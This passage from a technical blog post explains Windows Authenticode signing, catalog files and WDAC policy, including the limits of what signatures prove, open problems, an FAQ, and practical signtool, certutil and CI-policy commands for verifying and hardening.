&lt;td&gt;APK Signature Scheme v3 (block inside the APK) [@android-apk-v3]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No (signatures live inside the APK)&lt;/td&gt;
&lt;td&gt;Proof-of-rotation chain inside the v3 block lets a publisher rotate keys without re-signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;sigstore (OCI artefacts)&lt;/td&gt;
&lt;td&gt;Detached signature in OCI registry; short-lived Fulcio cert [@sigstore-overview]&lt;/td&gt;
&lt;td&gt;Closest analogue -- detached signature can cover blobs [@cosign-blobs]&lt;/td&gt;
&lt;td&gt;Yes -- Rekor [@rekor-github]&lt;/td&gt;
&lt;td&gt;TSA-style entries possible via Rekor&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The closest design analogue to the Windows catalog model is sigstore. Both decouple the signature from the artefact, and both let a single signing event cover many files. The difference is &lt;em&gt;where the detached signature lives&lt;/em&gt;. Windows puts the &lt;code&gt;.cat&lt;/code&gt; on the endpoint and refreshes the catalog through the OS update channel; sigstore stores the detached signature in an OCI registry and writes an attestation to a Rekor transparency log. That difference is also what gives Windows the offline-stale-catalog problem (a disconnected endpoint cannot freshness-check &lt;code&gt;CatRoot&lt;/code&gt;) and gives sigstore the offline-no-Rekor problem (a disconnected verifier cannot consult the log).Readers who want the broader cross-platform identity comparison should consult the earlier &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;&lt;em&gt;App Identity in Windows&lt;/em&gt;&lt;/a&gt; article in this series, which compares Apple&apos;s package identity, Android&apos;s app IDs, and Linux&apos;s lack of a unified equivalent in more depth. The present article only summarises the &lt;em&gt;signature-carrier&lt;/em&gt; side of the comparison.&lt;/p&gt;
&lt;p&gt;Whether Microsoft puts the catalog on the endpoint or in an OCI registry is a deployment choice. The &lt;em&gt;limit&lt;/em&gt; of what any signature -- catalog, embedded, sigstore-anchored, Apple-notarised -- can prove is a deeper, more uncomfortable claim. We turn to that next.&lt;/p&gt;
&lt;h2&gt;9. What signatures cannot prove&lt;/h2&gt;
&lt;p&gt;Stuxnet did not break Authenticode. It walked through it. The same is true of Flame, of ShadowHammer, and of the Bitwarden CLI npm hijack. Every named incident on the modern Windows code-signing timeline is an instance of the same structural lower bound: signatures prove &lt;em&gt;who&lt;/em&gt;, not &lt;em&gt;what&lt;/em&gt;. The Windows code-identity stack has spent fourteen years adding layers that narrow the consequences of that bound. None of them eliminate it.&lt;/p&gt;
&lt;p&gt;Four limits are worth naming explicitly.&lt;/p&gt;
&lt;h3&gt;L1. Provenance is not safety&lt;/h3&gt;
&lt;p&gt;By Rice&apos;s theorem corollary, no decision procedure can determine arbitrary non-trivial semantic properties of a program. A signing system can therefore certify only &quot;this binary came from a key-holder,&quot; never &quot;this binary is benign.&quot; Stuxnet 2010 [@stuxnet-dossier], Flame 2012 [@stevens-counter-cryptanalysis][@ms-advisory-2718704], Operation ShadowHammer 2019 [@securelist-shadowhammer], and the Bitwarden CLI npm hijack of 22 April 2026 [@bitwarden-statement][@stepsecurity-bitwarden][@hackernews-bitwarden] are four independent instances of the same gap, across four entirely different attack surfaces (stolen kernel-driver key; forged sub-CA via MD5 collision; compromised ASUS Live Update certificate; compromised npm OIDC trusted-publishing). The empirical scale is concrete: Kim, Kwon, and Dumitraș identified 325 signed malware samples, 189 of them carrying valid signatures produced by 111 compromised code-signing certificates, in their CCS 2017 paper [@dumitras-ccs-2017].&lt;/p&gt;
&lt;p&gt;The mathematics of Rice&apos;s theorem is succinct. Let $P$ be any non-trivial semantic property of programs (e.g. &lt;em&gt;is malicious&lt;/em&gt;). For any algorithm $A$ that on input program $p$ outputs $A(p) \in {\text{yes}, \text{no}}$ claiming whether $p$ has property $P$, there exists a program $q$ where $A(q)$ is wrong. A signature scheme is not such an algorithm $A$ in the first place: it computes $\text{Sig}_{\text{sk}}(\text{hash}(p))$. The signature output has no semantic content about $p$&apos;s behaviour; it asserts only that the holder of $\text{sk}$ touched $\text{hash}(p)$.&lt;/p&gt;
&lt;h3&gt;L2. CA cardinality and the weakest-link property&lt;/h3&gt;
&lt;p&gt;The trust graph for kernel-mode loads is narrow: a small number of Microsoft roots [@mslearn-kmcs-policy]. The trust graph for user-mode loads is the union of every root in the system Trusted Root store -- a much larger set. &lt;em&gt;Any one&lt;/em&gt; root, if compromised, degrades the entire user-mode code-identity trust graph; &lt;em&gt;any one&lt;/em&gt; sub-CA, if forged, opens the kernel-mode path for the lifetime of the certificate. The Sotirov / Stevens / Appelbaum / Lenstra / Molnar / Osvik / de Weger rogue-CA work from December 2008 [@hashclash-rogue-ca] demonstrated this dynamic for the web PKI; the same family of attack was then mounted in Flame in 2012 against the Microsoft Enforced Licensing Intermediate PCA [@ms-advisory-2718704]. The CSBR&apos;s EV-on-hardware requirements [@cabf-cs-documents] reduce stolen-key risk at the leaf level, but a forged sub-CA bypasses the leaf entirely.&lt;/p&gt;
&lt;h3&gt;L3. Catalog-store freshness on disconnected endpoints&lt;/h3&gt;
&lt;p&gt;A disconnected endpoint cannot freshness-check its &lt;code&gt;CatRoot&lt;/code&gt;. The catalog database is whatever Windows Update last delivered -- which means freshly issued catalogs covering newly shipped inbox files cannot be trusted on machines that have been offline. The Vulnerable Driver Blocklist faces the same problem in reverse: a freshly blocked driver does not become &lt;em&gt;un&lt;/em&gt;-trusted on a disconnected endpoint until the supplemental policy lands. Microsoft acknowledges this in the VDB documentation: &lt;em&gt;&quot;It&apos;s often necessary for us to hold back some blocks to avoid breaking existing functionality&quot;&lt;/em&gt; [@mslearn-recommended-driver-block-rules]. The publication lag is deliberate, not accidental, and there is no in-band way for an endpoint to ask &quot;is my VDB current?&quot;&lt;/p&gt;
&lt;h3&gt;L4. TSA centralisation and antedating&lt;/h3&gt;
&lt;p&gt;RFC 3161 has no transparency log. A compromised TSA can issue countersignatures with arbitrary &lt;code&gt;genTime&lt;/code&gt; undetectably, until and unless the TSA&apos;s root is revoked. Sigstore Rekor [@rekor-github] is the canonical answer to this problem in the OSS world; nothing equivalent ships in the Authenticode stack. The consequence is asymmetric: a compromised TSA can antedate a signature backwards, making a freshly signed but recently malicious binary appear to have been signed before the malicious campaign began -- which on most verifiers means it will &lt;em&gt;still&lt;/em&gt; verify even after the actual signing certificate is revoked.&lt;/p&gt;

flowchart TD
    L1[&quot;L1: Provenance != safety&lt;br /&gt;(Rice&apos;s theorem corollary)&quot;]
    L2[&quot;L2: CA cardinality&lt;br /&gt;(weakest-link property)&quot;]
    L3[&quot;L3: CatRoot freshness&lt;br /&gt;(offline endpoints stale)&quot;]
    L4[&quot;L4: TSA centralisation&lt;br /&gt;(no transparency log)&quot;]
    Floor[&quot;What is actually being proved:&lt;br /&gt;a key-holder touched hash(p) at genTime&quot;]
    L1 --&amp;gt; Floor
    L2 --&amp;gt; Floor
    L3 --&amp;gt; Floor
    L4 --&amp;gt; Floor

A valid signature proves only who signed the binary, never what the binary does.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Authenticode is the floor of Windows trust, not the ceiling. Every later layer -- Kernel-Mode Code Signing, App Control for Business, the Vulnerable Driver Blocklist, HVCI page-hash enforcement -- exists because the floor cannot, by construction, do more.&lt;/p&gt;
&lt;/blockquote&gt;

Stuxnet 2010, Flame 2012, ShadowHammer 2019, and Bitwarden CLI 2026 are four instances of the same lower bound, fourteen years apart, across four entirely different surfaces: a stolen private key for a kernel driver; a forged Microsoft sub-CA via cryptographic collision; a compromised ASUSTeK signing certificate used to sign a malicious updater; a compromised npm OIDC trusted-publishing pipeline used to publish a malicious CLI release. In each case the signature was valid. In each case the binary was malicious. The layers we add -- cross-signing deprecation, EV-on-hardware, the VDB, WDAC -- do not close the gap. They reduce the blast radius of the inevitable next incident.
&lt;p&gt;Once you see provenance and safety as separate questions, every open problem in the code-signing stack lines up in one direction: how do you reduce the blast radius of the inevitable next valid-but-malicious signature?&lt;/p&gt;
&lt;h2&gt;10. Open problems&lt;/h2&gt;
&lt;p&gt;Five problems are concrete enough to call out as ongoing work.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;O1. Post-quantum Authenticode.&lt;/strong&gt; Microsoft has not yet published a &lt;code&gt;SpcIndirectDataContent&lt;/code&gt; variant that references the &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;ML-DSA&lt;/a&gt; (FIPS 204 [@fips-204]) or SLH-DSA (FIPS 205 [@fips-205]) OIDs. The CA/B Forum CSBR has not named a post-quantum algorithm for code-signing certificates; the current CSBR v3.8 [@cabf-cs-documents] still rests on RSA and ECDSA. NIST&apos;s PQC programme plans to deprecate quantum-vulnerable algorithms around 2030 and disallow them after 2035 [@nist-pqc]. The CMS extensibility precedents are there: RFC 8554 profiles stateful LMS [@rfc-8554], RFC 8419 profiles EdDSA in CMS [@rfc-8419], and there is no architectural reason the same approach cannot profile ML-DSA. A hybrid-signed binary that carries both an RSA and an ML-DSA &lt;code&gt;SignerInfo&lt;/code&gt; inside the same &lt;code&gt;SignedData&lt;/code&gt; is technically possible today, and Microsoft will likely have to ship it before catastrophic loss of confidence in RSA can happen.FIPS 204 (ML-DSA) and FIPS 205 (SLH-DSA) were both finalised on 13 August 2024 [@fips-204][@fips-205]. The standards are stable; what is missing is the Authenticode-side OID registration and the Hardware Developer Center portal-signing pipeline that would emit a PQ counter-signature. The CSBR side and the Microsoft side both have to move; neither has publicly committed to a date.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;O2. Per-page integrity for non-PE artefacts.&lt;/strong&gt; Page hashes inside &lt;code&gt;SpcPeImagePageHashes2&lt;/code&gt; [@authenticode-pe-docx] are PE-specific. PowerShell scripts, MSIX packages, Appx packages, and the &lt;code&gt;.cat&lt;/code&gt; files themselves rely on whole-file Authenticode hashing; if an attacker can corrupt a single byte after load, the OS does not currently re-hash. HVCI gives PE binaries a runtime check; the script and package side does not yet have an equivalent.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;O3. Transparency logs for Authenticode countersignatures.&lt;/strong&gt; RFC 3161 TSAs do not publish their issued tokens. A backdated countersignature from a compromised TSA is currently undetectable beyond CA revocation. Sigstore Rekor [@rekor-github] demonstrates that a transparency log integrates with a signing pipeline at low overhead; there is no equivalent for the Microsoft-signed-driver world or for third-party Authenticode signers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;O4. Revocation propagation latency.&lt;/strong&gt; The gap between &quot;the CA revokes&quot; and &quot;every endpoint refuses to verify&quot; is empirically days to weeks. CRLs are downloaded on a cadence (with &lt;code&gt;EnableCertPaddingCheck&lt;/code&gt; aside, OCSP is not even applied to Authenticode by default). The VDB&apos;s quarterly cadence [@mslearn-recommended-driver-block-rules] is faster than CRL-only and slower than the rate at which attackers can stand up an attack with a freshly stolen certificate. Some of this is unavoidable -- you cannot push a revocation faster than an offline endpoint can reach Windows Update -- but a structurally better answer is one of the open questions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;O5. Post-CrowdStrike (July 2024) kernel-driver-loading discipline.&lt;/strong&gt; Microsoft&apos;s Windows Resiliency Initiative was announced in the wake of the 19 July 2024 CrowdStrike Falcon Sensor outage; a fully-specified replacement for today&apos;s third-party kernel-driver model has not yet shipped. A successful answer would push parts of today&apos;s Authenticode + KMCS + WDAC story toward sandboxed user-mode driver frameworks, with the kernel restricted to a much narrower interface. The Authenticode primitives this article has dissected will still be the substrate; what gets layered on top is the open architectural question.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This article is about the &lt;em&gt;crypto foundation&lt;/em&gt; under WDAC: the bytes on disk, the envelope structures, the chain of trust. It does not cover the runtime enforcement layer -- how Code Integrity, HVCI, and the secure kernel use these primitives at process- and driver-load time, how page hashes are checked at fault time, how the Vulnerable Driver Blocklist is loaded as a supplemental policy. That story is the subject of the next post in this series.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The next decade of Windows code-signing is going to be dominated by post-quantum migration and by whatever the Windows Resiliency Initiative converges to. Both will be evolution, not revolution: they will sit on top of the certificate-table, catalog-store, and timestamp-token primitives that have been load-bearing since 1996. To finish, the day-to-day commands that interrogate every byte we have discussed.&lt;/p&gt;
&lt;h2&gt;11. Practical guide: signtool, certutil, New-CIPolicyRule&lt;/h2&gt;
&lt;p&gt;If you have read this far, you should be able to run the following commands on a Windows host and explain every field of their output. Microsoft&apos;s &lt;code&gt;signtool&lt;/code&gt;, &lt;code&gt;certutil&lt;/code&gt;, and the &lt;code&gt;ConfigCI&lt;/code&gt; PowerShell module are the canonical tools [@mslearn-crypto-tools].&lt;/p&gt;
&lt;h3&gt;Verify a signed binary end to end&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;signtool verify /v /pa /all &quot;C:\Path\To\binary.exe&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output prints, in order: the SHA-256 of the file&apos;s Authenticode hash, the leaf certificate&apos;s subject and issuer, every intermediate up to the trusted root, the RFC 3161 timestamp&apos;s &lt;code&gt;genTime&lt;/code&gt;, and the policy used to validate. &lt;code&gt;/pa&lt;/code&gt; selects the Default Authenticode Verification Policy (used instead of the Windows Driver Verification Policy that applies when &lt;code&gt;/pa&lt;/code&gt; is omitted); &lt;code&gt;/all&lt;/code&gt; walks every signature on the file rather than just the strongest.&lt;/p&gt;
&lt;h3&gt;Compute and look up an Authenticode hash&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;certutil -hashfile &quot;C:\Path\To\driver.sys&quot; SHA256
certutil -CatDB &quot;C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}&quot; /v /search &amp;lt;hash&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-hashfile&lt;/code&gt; command emits the &lt;em&gt;file&lt;/em&gt; SHA-256, which is &lt;em&gt;not&lt;/em&gt; the Authenticode hash (the file SHA-256 includes the certificate-table bytes; the Authenticode hash excludes them). The Authenticode hash is what is stored inside each catalog&apos;s &lt;code&gt;CatalogList&lt;/code&gt;. &lt;code&gt;Get-AuthenticodeSignature&lt;/code&gt; is the easier PowerShell route to the Authenticode hash directly.&lt;/p&gt;
&lt;h3&gt;Walk the catalog store&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;Get-ChildItem &quot;C:\Windows\System32\CatRoot&quot; -Recurse | Select-Object FullName
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The GUID-named subfolder is the CryptSvc policy database identifier; the &lt;code&gt;.cat&lt;/code&gt; files inside are individually-signed &lt;code&gt;SignedData&lt;/code&gt; blobs whose &lt;code&gt;encapContentInfo&lt;/code&gt; is a &lt;code&gt;CatalogList&lt;/code&gt; [@mslearn-catalog-files]. &lt;code&gt;CatRoot2&lt;/code&gt; holds staging copies and the catalog database index.&lt;/p&gt;
&lt;h3&gt;Generate a WDAC rule&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;New-CIPolicyRule -FilePath &quot;C:\Path\To\App.exe&quot; -Level FilePublisher
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This produces an XML &lt;code&gt;&amp;lt;FileRule&amp;gt;&lt;/code&gt; element with the issuer, subject CN, original file name, and minimum file version. Pipe the result into &lt;code&gt;New-CIPolicy&lt;/code&gt; to build a policy XML; convert to binary with &lt;code&gt;ConvertFrom-CIPolicy&lt;/code&gt; and deploy via Group Policy or Intune.&lt;/p&gt;
&lt;h3&gt;Decide between embedded and catalog signing&lt;/h3&gt;
&lt;p&gt;For an internal line-of-business app shipped as a single MSI, embedded signing is the default and the cleanest choice. For a multi-binary package where some files are third-party and unsignable, the Package Inspector workflow [@mslearn-deploy-catalog-files] builds a &lt;code&gt;.cat&lt;/code&gt; covering the post-installation file set without modifying any binary:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;PackageInspector.exe Start C:\
... install your app ...
PackageInspector.exe Stop C:\ -Name MyApp.cat -ResultsFile C:\Temp\MyApp_inspection.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Confirm a kernel-mode chain&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;signtool verify /v /pa /kp &quot;C:\Windows\System32\drivers\example.sys&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;/kp&lt;/code&gt; policy uses the kernel-mode driver policy: the chain must terminate at a kernel-mode-trusted root (the &lt;code&gt;Microsoft Code Verification Root&lt;/code&gt; family of anchors, or a portal-signed-driver Microsoft Root Authority anchor). &lt;code&gt;certutil -store -enterprise root&lt;/code&gt; enumerates the local kernel-mode roots; the legacy &lt;code&gt;Microsoft Code Verification Root&lt;/code&gt; is named on the KMCS policy page [@mslearn-kmcs-policy] but its thumbprint is not published on a stable Microsoft Learn URL -- you read it via &lt;code&gt;certutil -store&lt;/code&gt; on the running system.&lt;/p&gt;
&lt;h3&gt;Make an informed &lt;code&gt;EnableCertPaddingCheck&lt;/code&gt; decision&lt;/h3&gt;
&lt;p&gt;The strict-parser registry value lives in two places. Set both:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;reg add &quot;HKLM\Software\Microsoft\Cryptography\Wintrust\Config&quot; /v EnableCertPaddingCheck /t REG_DWORD /d 1 /f
reg add &quot;HKLM\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config&quot; /v EnableCertPaddingCheck /t REG_DWORD /d 1 /f
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;CISA added CVE-2013-3900 to the Known Exploited Vulnerabilities catalogue on 10 January 2022 [@nvd-cve-2013-3900]; treat this as effectively mandatory in any hardened-baseline build.&lt;/p&gt;
&lt;h3&gt;Annotated &lt;code&gt;signtool verify&lt;/code&gt; output&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;Verifying: notepad.exe
Hash of file (sha256): 6B9B7E...   &amp;lt;-- Authenticode hash, the same one
                                       inside SpcIndirectDataContent.messageDigest
Signing Certificate Chain:
  Issued to: Microsoft Root Certificate Authority 2010   &amp;lt;-- root anchor
    Issued by: Microsoft Root Certificate Authority 2010
  Issued to: Microsoft Windows Production PCA 2011        &amp;lt;-- intermediate / PCA
    Issued by: Microsoft Root Certificate Authority 2010
  Issued to: Microsoft Windows                             &amp;lt;-- leaf / signer
    Issued by: Microsoft Windows Production PCA 2011
The signature is timestamped: Thu Jul ...                 &amp;lt;-- RFC 3161 genTime
Timestamp Verified by:
  Issued to: Microsoft Time-Stamp PCA 2010                &amp;lt;-- TSA chain
  Issued to: Microsoft Time-Stamp Service
File is signed and the signature was verified.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;{`
// Cross-platform pedagogy: this snippet shows the flow of a catalog lookup.
// On Windows, &quot;certutil -CatDB  /v /search &quot; returns the
// covering catalog file. Off Windows, we mock the output so the flow is visible.&lt;/p&gt;
&lt;p&gt;interface CatalogLookupResult {
  hash: string;
  catalogFile: string | null;
  signerSubject: string | null;
}&lt;/p&gt;
&lt;p&gt;function lookupCatalog(authenticodeHash: string): CatalogLookupResult {
  // Real implementation would shell out to:
  //   certutil -CatDB  /v /search 
  // Parse the output for &quot;Hash:   Catalog: &quot;.
  const known: Record&amp;lt;string, CatalogLookupResult&amp;gt; = {
    &quot;6B9B7E...&quot;: {
      hash: &quot;6B9B7E...&quot;,
      catalogFile: &quot;C:\\Windows\\System32\\CatRoot\\{F750E6C3-...}\\Package_for_KB12345.cat&quot;,
      signerSubject: &quot;CN=Microsoft Windows Production PCA 2011&quot;
    }
  };
  return known[authenticodeHash] || { hash: authenticodeHash, catalogFile: null, signerSubject: null };
}&lt;/p&gt;
&lt;p&gt;const r = lookupCatalog(&quot;6B9B7E...&quot;);
console.log(r.catalogFile ? &quot;Catalog-signed by &quot; + r.signerSubject : &quot;Not catalog-covered&quot;);
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The most common practitioner mistake is &lt;code&gt;signtool sign /n &amp;lt;name&amp;gt;&lt;/code&gt; without &lt;code&gt;/tr &amp;lt;tsa-url&amp;gt; /td sha256&lt;/code&gt;. A signature produced this way silently loses validity the moment the end-entity certificate expires -- which can be years later, when the signer has long since lost access to whatever signing key produced it. The fix is to always include &lt;code&gt;/tr&lt;/code&gt; and a strong &lt;code&gt;/td&lt;/code&gt;. RFC 3161 [@rfc-3161] is the entire reason long-lived signatures still verify; opting out of it is opting out of the longevity guarantee.&lt;/p&gt;
&lt;/blockquote&gt;

SmartScreen Application Reputation is not gated on Authenticode validity. It is gated on certificate *class* (EV vs. OV) and on aggregate *download volume* and reporting. An internally signed enterprise LOB app has neither: it is signed with an OV certificate, and its download volume is at most a few hundred enterprise users. The fix has two paths. The cheap one is to ride your enterprise WDAC policy rather than fight SmartScreen -- App Control rules allow the binary unconditionally inside your organisation. The expensive one is to buy an EV certificate, push the binary through a small early-access user pool, and let SmartScreen accumulate the reputation signal. Both work. Fighting SmartScreen with a louder OV signature does not.
&lt;p&gt;These seven commands cover the full surface of what Authenticode, catalog signing, and WDAC let a Windows engineer actually inspect. Everything else in this article is context for what those command outputs &lt;em&gt;mean&lt;/em&gt;.&lt;/p&gt;
&lt;h2&gt;12. Frequently asked questions&lt;/h2&gt;

Authenticode is a specific PKCS#7 / CMS profile for signing Windows portable executables, catalog files, and a small set of related artefacts. It is defined by Microsoft&apos;s `Authenticode_PE.docx` specification [@authenticode-pe-docx] and is characterised by a PE-specific Authenticode hash (with four exclusions), the `SpcIndirectDataContent` content type at OID `1.3.6.1.4.1.311.2.1.4`, and the `WIN_CERTIFICATE` certificate-table wrapper. Other code-signing schemes -- JAR signing for Java, APK Signature Scheme v3 for Android [@android-apk-v3], sigstore/cosign for OCI artefacts [@sigstore-overview], Apple Notarization for macOS [@apple-notarization] -- are not Authenticode-compatible. They solve similar problems with different envelopes.

Not if the signature was RFC 3161 timestamped at signing time. The `TimeStampToken` in the unsigned attributes pegs the signing event to a `genTime` from a Trusted Time-Stamping Authority [@rfc-3161]; later verifiers compare `genTime` to the signing certificate&apos;s validity window and honour the signature so long as `genTime` was inside that window. The signature *will* stop working on hash-only WDAC rules (which do not consult certificate expiry at all) and on the rare verifiers that enforce chain time at validation. Signing without `/tr` is the way to produce a signature that silently loses validity at end-entity-cert expiry; that is the single most common Authenticode mistake at signing time.

Only by enabling Test Signing mode (which puts a watermark on the desktop and refuses to coexist with Secure Boot), or by booting with Driver Signature Enforcement disabled (which is a one-boot bypass), or by using a vulnerable signed driver to load your unsigned code (the entire point of the Vulnerable Driver Blocklist [@mslearn-recommended-driver-block-rules]). Production loading of an unsigned driver on a normally configured Windows 11 system is not supported. Cross-signing for new end-entity certs has been closed since the 29 July 2015 issuance cutoff [@mslearn-kmcs-policy]; cross-certificates expired by July 2021 [@mslearn-deprecation-spc-crc].

See the §11 Spoiler *&quot;Why your internally-signed LOB app trips SmartScreen&quot;* for the detailed explanation of why SmartScreen Application Reputation weights certificate class (EV vs. OV) and download volume rather than Authenticode validity, and for the two production fixes (ride your enterprise App Control policy, or buy an EV certificate and let reputation accumulate). The one-line summary: Authenticode and SmartScreen are different decision systems that happen to read the same `SignerInfo` -- making your signature *louder* in Authenticode does not buy you reputation in SmartScreen.

The `Microsoft Code Verification Root` is the historical kernel-mode trust anchor whose intermediate cross-signed third-party kernel code-signing CAs for pre-July-2015 drivers [@mslearn-kmcs-policy]. It is named in the KMCS policy document; its thumbprint is not published on a stable Microsoft Learn URL, so practitioners read it via `certutil -store` on the running system. The `Microsoft Code Signing PCA` family of intermediates (and its newer cousins like `Microsoft Windows Production PCA 2011`) are user-mode signing chains used for Microsoft-internal binaries and most WHQL catalogs. Both feed into `WinVerifyTrust`; they differ in which downstream consumer treats them as authoritative -- the kernel for the former, user-mode trust decisions for the latter.

No. The Authenticode hash excludes four PE regions: the optional-header `CheckSum` (4 bytes), the `IMAGE_DIRECTORY_ENTRY_SECURITY` data-directory entry (8 bytes), the certificate-table bytes themselves, and the file-alignment padding after each section [@authenticode-pe-docx]. So `(Get-AuthenticodeSignature notepad.exe).Hash` returns a different value than `certutil -hashfile notepad.exe SHA256`. The Authenticode hash is what is stored inside `SpcIndirectDataContent.messageDigest` and what is matched against catalog `memberHash` entries; the file SHA-256 is useful for forensic identification but does not appear anywhere in the signature flow.

They differ in precision and in which Authenticode fields they consult [@mslearn-select-types-of-rules]. `Publisher` allows anything signed by a given issuing CA + leaf-cert subject CN; broadest but loosest. `FilePublisher` adds `OriginalFileName` + `MinimumFileVersion` constraints; tightens to a specific binary at a min version. `WHQLFilePublisher` further requires the WHQL EKU; the strictest commonly used rule level. Self-updating apps invalidate `FilePublisher` rules silently when their `OriginalFileName` or `FileVersion` change without warning [@mslearn-use-code-signing]; most enterprises start at `Publisher` and tighten only for high-risk binaries.

No. NVD&apos;s verbatim Microsoft language: *&quot;Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows. This behavior remains available as an opt-in feature via reg key setting, and is available on supported editions of Windows released since December 10, 2013&quot;* [@nvd-cve-2013-3900]. CISA added the CVE to the Known Exploited Vulnerabilities catalogue on 10 January 2022 with a federal due date of 10 July 2022. Hardened environments should set `EnableCertPaddingCheck=1` in both the native and `Wow6432Node` registry paths.
&lt;h2&gt;13. Closing reflection&lt;/h2&gt;
&lt;p&gt;In August 1996 the Authenticode trust decision was a single yes/no answer to a single question: did this PKCS#7 SignedData blob, attached to this downloadable ActiveX control, validate against a CA in the user&apos;s browser? Thirty years later, the trust decision is a chained question composing every primitive in this article: a &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; record points to a &lt;code&gt;SignedData&lt;/code&gt; envelope; the envelope&apos;s &lt;code&gt;SpcIndirectDataContent&lt;/code&gt; carries an Authenticode hash and optional page hashes; an unsigned attribute carries an RFC 3161 timestamp; the catalog store may carry a parallel signature for the same hash; the certificate chain terminates at one of a small set of Microsoft anchors for kernel-mode loads; an administrator&apos;s App Control policy decides whether the verdict survives the rule evaluation; the Vulnerable Driver Blocklist denies a small curated list outright.&lt;/p&gt;
&lt;p&gt;The cryptography has not moved. The certificate table is still where the bytes live. PKCS#7 SignedData is still the envelope. RSA, now joined by ECDSA, is still the dominant signature algorithm. What has changed -- and what is going to keep changing through the post-quantum migration and whatever the Windows Resiliency Initiative converges to -- is the layering of policy on top.&lt;/p&gt;
&lt;p&gt;Authenticode is not the ceiling. It is the floor. Everything else is built on top, and the next time a Realtek certificate is stolen, those layers are what decides whether the next Stuxnet still loads.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;authenticode-and-catalog-files-the-crypto-foundation-under-wdac&quot; keyTerms={[
  { term: &quot;Authenticode&quot;, definition: &quot;Microsoft&apos;s PKCS#7 / CMS profile for signing Windows PE binaries, defined by Authenticode_PE.docx.&quot; },
  { term: &quot;WIN_CERTIFICATE&quot;, definition: &quot;The PE certificate-table record (dwLength, wRevision, wCertificateType, bCertificate[]) wrapping the PKCS#7 SignedData blob.&quot; },
  { term: &quot;SpcIndirectDataContent&quot;, definition: &quot;Microsoft eContentType (OID 1.3.6.1.4.1.311.2.1.4) whose messageDigest is the Authenticode hash; signs a hash, not a file.&quot; },
  { term: &quot;Authenticode hash&quot;, definition: &quot;The PE digest computed with four regions excluded (CheckSum, SECURITY data-directory entry, certificate-table bytes, section-padding).&quot; },
  { term: &quot;Page hash (SpcPeImagePageHashes2)&quot;, definition: &quot;Signed attribute carrying per-4 KiB-page hashes for HVCI demand-fault-time verification.&quot; },
  { term: &quot;Catalog file (.cat)&quot;, definition: &quot;A degenerate SignedData whose encapsulated content is a CatalogList of (memberHash, attributes) tuples; detached signature.&quot; },
  { term: &quot;CatRoot / CryptSvc&quot;, definition: &quot;On-endpoint catalog store at %SystemRoot%\System32\CatRoot\{GUID}\ and the service that indexes member hashes.&quot; },
  { term: &quot;Trusted Time-Stamping Authority (TSA)&quot;, definition: &quot;RFC 3161 service that counter-signs a signature&apos;s hash with a trusted genTime, attached as an unsigned attribute.&quot; },
  { term: &quot;WinVerifyTrust&quot;, definition: &quot;CryptoAPI function orchestrating the Authenticode verification pipeline.&quot; },
  { term: &quot;Code Integrity / ci.dll&quot;, definition: &quot;Windows kernel-mode component enforcing KMCS on driver loads and feeding page hashes to HVCI.&quot; },
  { term: &quot;Microsoft Code Verification Root&quot;, definition: &quot;Historical kernel-mode trust anchor for cross-signed third-party drivers; thumbprint read via certutil -store.&quot; },
  { term: &quot;App Control for Business (WDAC)&quot;, definition: &quot;Post-2024 rename of Windows Defender Application Control; consumes Authenticode primitives as policy inputs.&quot; },
  { term: &quot;FilePublisher rule&quot;, definition: &quot;WDAC rule level allowing Publisher + OriginalFileName + MinimumFileVersion combinations.&quot; },
  { term: &quot;Vulnerable Driver Blocklist (VDB)&quot;, definition: &quot;Microsoft-curated supplemental deny policy enabled by default since Windows 11 22H2; quarterly cadence.&quot; },
  { term: &quot;RFC 3161 TimeStampToken&quot;, definition: &quot;CMS SignedData over hash(signature) || genTime, attached at OID 1.2.840.113549.1.9.16.2.14 as an unsigned attribute.&quot; }
]} /&amp;gt;&lt;/p&gt;
